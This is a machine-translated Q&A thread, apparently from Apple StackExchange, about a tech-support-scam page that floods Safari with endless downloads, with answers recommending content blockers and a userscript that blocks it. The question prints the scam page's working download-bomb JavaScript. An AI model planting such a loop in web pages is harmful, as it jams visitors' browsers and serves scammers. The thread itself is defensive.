防止在Safari上进行垃圾邮件下载

背景

一个新的垃圾邮件页面已开始出现在许多“可疑”网站（电影网站等）中。这个新的垃圾邮件页面属于伪扫描，MacKeeper，“您有病毒”等类别。

问题

这个新页面的问题在于，该页面不仅会弹出，而且实际上每隔1ms就会重复启动2kb随机文件的下载（这对有害的随机文本而言是无害的）。在关闭窗口之前，下载文件夹已满，您将删除1000多个文件。与页面垃圾邮件打开打印对话框的类似问题不同，响应时间很少。

失败的故障排除尝试

• 我尝试锁定下载文件夹。虽然它阻止了下载...很好...下载它，但出现了一个对话框（参见图片）。通常，我可以关闭该对话框，但是由于每隔1毫秒尝试进行一次下载，因此每次尝试关闭该对话框时都会弹出一个新对话框，阻止我关闭该窗口。

• 强制退出Safari，Safari停止下载（下载1k后），但随后我放开了所有其他窗口

• 将Safari偏好设置中的设置更改为“每次下载均询问”。无法使用，因为打开了1k的独立对话框使我什至无法关闭标签页。最终使Safari崩溃。

题

如何防止Safari中的垃圾邮件下载？

更新：

继承人代码导致下载（通过禁用JavaScript并手动浏览代码即可获得）：

 function download(g, h, j) {
                var k = new Blob([g], {
                        type: j
                });
                if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
                else {
                        var l = document.createElement("a"),
                                m = URL.createObjectURL(k);
                        l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
                }
        }
        function bomb_ch() {
                var g = Math.random().toString(36).substring(20),
                        h = Math.floor(50 * Math.random() + 25);
                while (true) download(h, g, g)
        }
        function ch_jam() {
                bomb_ch()
        }

注意：在自定义页面上运行JS时遇到一些问题。它冻结，而不是下载。我可以通过使用setInterval()调用该download函数的函数来模拟下载。

更多信息：https : //blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/

对于有选择性的Safari内容阻止程序/ javascript阻止程序，这不是一个好例子吗？

在Mac上，Ghostery可能是一个不错的起点，以了解您是否可以使用预先建立的规则来消除跨站点脚本/将代码的广告注入网页。当然，如果该页面直接提供了该内容，则您需要完全禁用该页面上的javascript或记下注释，然后仅阻止那些故意破坏您的体验或由于将广告注入出售给任何有能力将其出售给任何人的网站负担得起这种恐吓和诈骗商品。

如果您想更精确-GreaseMonkey类型的用户脚本可以用您足够的JS知识来解决此问题（或者找到编写脚本以阻止当今这种恶意软件迭代的人）。

• https://tampermonkey.net/?browser=safari
• https://www.greasespot.net

由@JBis编辑

以下用户脚本已成功阻止该页面。

     // ==UserScript==
     // @name         The Bomb Squad
     // @version      0.1
     // @description  Blocks the pages containing any function with the bomb_ch function detailed in /apple/329594/prevent-spam-downloads-on-safari and https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/
     // @author       Josh Brown (@JBis https://apple.stackexchange.com/users/263848/jbis)
     // @match        *
     // @grant        none

    // ==/UserScript==

   if (typeof bomb_ch === "function") {
     document.getElementsByTagName("body")[0].innerHTML="<h1>Page Defused by The Bomb Squad</h1><p>Because it contatained the following
 function(s):  <pre>bomb_ch()</pre> <br>";
    }

注意： Sp（c）ammers可以通过使bomb_ch()函数随机化来轻松绕过此操作。

较新的OS版本的Safari可能会帮助您减少这一点，但是将这些废话传送到Mac的人们可以赚钱，因此他们很可能会适应任何试图使其易于阻止的技术。除非您愿意花更多的钱支持一家维护设置库的企业，该库可以“破坏分子”，并且适应能力比charlatans可以在其锅炉房内编写新代码快。

您还必须确定执行此操作的网站是否也属于骗子，因为他们应该知道这是发生在您身上，他们是托管的访问者之一。

尽管有许多功能强大的Safari广告拦截器，但针对基于扩展的广谱内容拦截器的选择却少得多。其中只有两个脱颖而出：Ghostery和uBlockOrigin [ 信息链接： https : //github.com/gorhill/uBlock 下载链接： https : //safari-extensions.apple.com/?q = ublock%20origin 。

编辑： 不要将uBlock Origin与非常相似的uBlock，混淆。两种产品的能力和声誉都大不相同。

他们可以做您想做的事并防止您的朋友经历过的下载爆炸吗？是的，区别在于Ghostery需要一些规则自定义，其中将uBlockOrigin设置为默认值。

我碰巧知道uBlockOrigin在您的“更多信息”链接中的Malwarebytes公告之前一个月就阻止了此特定漏洞利用。我不知道Ghostery的时间表。

我建议您给他们两个试用。